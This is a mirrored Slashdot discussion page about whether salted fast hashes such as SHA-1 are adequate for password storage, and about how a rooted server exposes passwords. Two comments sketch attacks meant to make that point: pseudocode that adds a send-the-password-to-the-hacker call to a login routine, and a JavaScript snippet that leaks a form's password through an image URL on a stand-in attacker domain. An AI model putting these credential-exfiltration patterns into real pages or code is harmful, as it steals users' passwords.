Slashdot Mirror

← Back to Stories (view on slashdot.org)

Are You Sure SHA-1+Salt Is Enough For Passwords?

Posted by CmdrTaco on from the good-enough-for-govt-work dept.

Melchett writes "It's all too common that Web (and other) applications use MD5, SHA1, or SHA-256 to hash user passwords, and more enlightened developers even salt the password. And over the years I've seen heated discussions on just how salt values should be generated and on how long they should be. Unfortunately in most cases people overlook the fact that MD and SHA hash families are designed for computational speed, and the quality of your salt values doesn't really matter when an attacker has gained full control, as happened with rootkit.com. When an attacker has root access, they will get your passwords, salt, and the code that you use to verify the passwords."

4 of 409 comments (clear)

  1. The problem is people by plover · · Score: 3, Interesting

    Like TFA says, worry more about the passwords people choose. It doesn't matter if you use SHA-1, MD5, or an HMAC, if the idiot types "password" for his password, it's going to be discovered on the first loop of anyone's "common passwords" list.

    One way to get people to comply better is simply to refer to it as a "passphrase" instead of a "password". Maybe enforce "three word minimum" or something. Even if they just use a line from a movie, it's increased the search space dramatically over a single word.

    --
    John
  2. Are MD and SHA easily reversible? by Frogg · · Score: 4, Interesting

    I don't get it - surely it shouldn't matter if someone gains access to the password verification routine, the salt and the encrypted passwords... unless the password hashing/encryption is easily reversible?

    They've still got to try and brute force match the encrypted data with a dictionary attack - sure, having the salt makes it easier - but if you've got the salt and the encrypted passwords it doesn't matter what encryption algorithm is used, you've still got to use a brute force dictionary attack. Most encryption algorithms aren't easily reversible - and that's the whole point.

  3. Who cares what method? by gnieboer · · Score: 3, Interesting

    The box is rooted, nothing you do matters. Just change the code...

    CHANGE:
    string pass = request("userspass")
    if UNBREAKABLYGOODHASH(pass, salthash) = RetrieveSaltedDBpasshash(username) {
                UserAuthenticated
    }

    TO:

    string pass = request("userspass")
    SendTheHackerThePassword(pass)
    if UNBREAKABLYGOODHASH(pass, salthash) = RetrieveSaltedDBpasshash(username) {
                UserAuthenticated
    }

    And you're done... Just wait for the passwords to come rolling in.

    Any rooted machine that handles the user's actual password can be coerced into giving it up. So limit what machines see that password. Have your web client hash the password before if goes to the host (even when it's a secure connection). That would help, though the client machines should be easiest to hack, but at least it takes longer to get the right password.

    1. Re:Who cares what method? by Gunstick · · Score: 3, Interesting

      Oh, the browser hashes the password.
      And the box is rooted?
      Put your code here:
      <head>
      <title>super secure website</title>
      </head>
      <body>
      <script>
      function doit() {
      document.write("<img src='http://senthehackerthepassword.com/"+form.password.value+"'>"
      }
      settimeout("doit()",5000) // could use onload or any other fancy technique
      </script> ...

      --
      Atari rules... ermm... ruled.